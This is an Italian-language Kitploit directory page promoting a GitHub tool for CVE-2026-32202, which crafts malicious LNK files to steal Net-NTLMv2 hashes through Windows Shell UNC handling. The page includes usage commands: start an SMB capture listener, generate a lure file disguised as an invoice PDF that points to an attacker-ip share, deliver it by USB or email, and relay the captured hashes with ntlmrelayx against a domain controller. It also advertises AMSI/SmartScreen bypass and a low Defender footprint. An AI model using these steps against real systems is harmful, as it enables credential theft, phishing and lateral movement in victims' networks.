Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-32202 — Genera file LNK dannosi per estorcere hash Net-NTLMv2 tramite la gestione UNC della Shell di Windows, con listener SMB personalizzato e integrazione relay per operazioni di red team autorizzate. | Kitploit
Strumenti/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
Generazione di PayloadExploitMovimento LateralePenetration TestingRed Teaming
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

Genera file LNK dannosi per estorcere hash Net-NTLMv2 tramite la gestione UNC della Shell di Windows, con listener SMB personalizzato e integrazione relay per operazioni di red team autorizzate.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
124 mesi faNon ancora revisionato
Condividi

Disclaimer

Questo strumento è destinato esclusivamente a red teaming autorizzato e penetration testing.
L'uso non autorizzato contro sistemi senza permesso esplicito è illegale.
Usalo a tuo rischio. L'autore non si assume alcuna responsabilità per usi impropri o danni.

Descrizione
Coercizione di hash NTLMv2 tramite bypass incompleto della protezione Shell di Windows (CVE-2026-32202). Genera file LNK appositamente realizzati che forzano l'autenticazione SMB/UNC all'apertura o all'anteprima in Esplora file. A bassa interazione, funziona su sistemi patchati dove la correzione di aprile 2026 è risultata insufficiente. Utilizzato attivamente in engagement.

Caratteristiche principali

  • Leak Net-NTLMv2 zero-click / a interazione minima tramite LNK dannoso (percorso di anteprima Esplora file + risoluzione icone).
  • Listener SMB personalizzato per la cattura degli hash (nessun bisogno di Responder, log più puliti).
  • Variante stabile con impronta ETW/Defender ridotta.
  • Modalità di bypass parziale AMSI/SmartScreen.
  • Pronto per catene di relay ntlmrelayx (SMB, LDAP, HTTP, ecc.).

Cosa fa l'exploit
Lo strumento crea un .LNK realizzato ad hoc che abusa della gestione dei percorsi UNC da parte della Shell in Target + IconEnvironmentDataBlock / strutture ExtraData. Quando la vittima sfoglia la cartella o passa il mouse/anteprima il file, la Shell di Windows avvia una connessione SMB verso l'UNC controllato dall'attaccante, facendo trapelare l'hash Net-NTLMv2 della macchina/utente. Nessuna esecuzione di codice sul target - coercizione delle credenziali per relay o cracking.

Perché è utile

  • Accesso iniziale rapido in pentest interni / operazioni red team (soprattutto in ambienti air-gapped o hardened dove il phishing è limitato).
  • Perfetto per il relay NTLM verso target ad alto valore (DC, file server, Exchange, ADCS, ecc.).
  • Funziona dove il classico Responder è bloccato o troppo rumoroso.
  • Alto tasso di successo su Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025 (build testate di seguito).

Testato su
  • Windows 11 24H2 (build 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (core + desktop experience)
  • Parzialmente efficace dopo l'aggiornamento cumulativo di aprile 2026 (patch incompleta confermata in natura).

Dipendenze Installazione: pip install -r requirements.txt

Utilizzo

root@kitploit:~
# 1. Avvia il server di cattura (host attaccante)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt

# 2. Genera il LNK dannoso
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"

# Opzionale: modalità stabile o bypass
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"

# 3. Consegna il LNK (USB, condivisione, allegato email, OneDrive, ecc.)

# 4. Attendi l'hash nel terminale + file. Esempio di relay:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# oppure relay LDAP per RBCD, HTTP per certificati ADCS, ecc.

Exploit

href

Limitazioni

  • Richiede che la vittima interagisca con la cartella contenente il file (anteprima/passaggio del mouse in Esplora file di solito è sufficiente).
  • La segmentazione di rete moderna + firma SMB + restrizioni NTLM riducono il successo del relay.
  • Non è una RCE completa - solo materiale credenziale.
  • Lo stato delle patch è importante; i sistemi completamente aggiornati ad aprile 2026+ potrebbero richiedere la variante bypass.

Causa principale (breve)
Correzione incompleta nella sanificazione dei percorsi UNC della Shell di Windows e nell'elaborazione dei blocchi ExtraData per la risoluzione di icone/target LNK. Il meccanismo di protezione pensato per bloccare lo spoofing di rete non autorizzato attiva comunque l'autenticazione NTLM durante l'enumerazione del namespace della Shell.

Scarica lo strumento